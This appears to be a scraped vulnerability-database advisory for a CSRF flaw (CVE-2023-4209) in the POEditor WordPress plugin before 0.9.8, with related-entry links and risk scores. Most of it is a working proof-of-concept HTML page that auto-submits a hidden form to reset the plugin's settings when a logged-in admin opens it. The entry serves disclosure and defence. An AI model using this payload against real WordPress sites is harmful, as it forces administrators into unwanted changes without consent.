Lucene search
DmitriiWPEX-ID:B2C6FA7D-1B0F-444B-8CA5-8C1C06CEA1D9HistoryAug 07, 2023 - 12:00 a.m.
POEditor < 0.9.8 - Settings Reset via CSRF
2023-08-0700:00:00
Dmitrii
29
poeditor csrf settings reset
html form
cross-site request forgery
security exploit
Description The plugin does not have CSRF checks in various places, which could allow attackers to make logged in admins perform unwanted actions, such as reset the plugin’s settings and update its API key via CSRF attacks.
<html>
<body>
<form action="https://example.com/wp-admin/tools.php">
<input type="hidden" name="page" value="poeditor" />
<input type="hidden" name="do" value="clean" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Related
cvelist
cvelist
CVE-2023-4209 POEditor < 0.9.8 - Settings Reset via CSRF
2023-08-30 14:22:05
nvd
nvd
CVE-2023-4209
2023-08-30 15:15:10
prion
prion
Cross site request forgery (csrf)
2023-08-30 15:15:00
wpvulndb
wpvulndb
POEditor < 0.9.8 - Settings Reset via CSRF
2023-08-07 00:00:00
cve
cve
CVE-2023-4209
2023-08-30 15:15:10
wordfence
wordfence
AI Score
7.3
Confidence
Low
EPSS
0.001
Percentile
17.0%
Related for WPEX-ID:B2C6FA7D-1B0F-444B-8CA5-8C1C06CEA1D9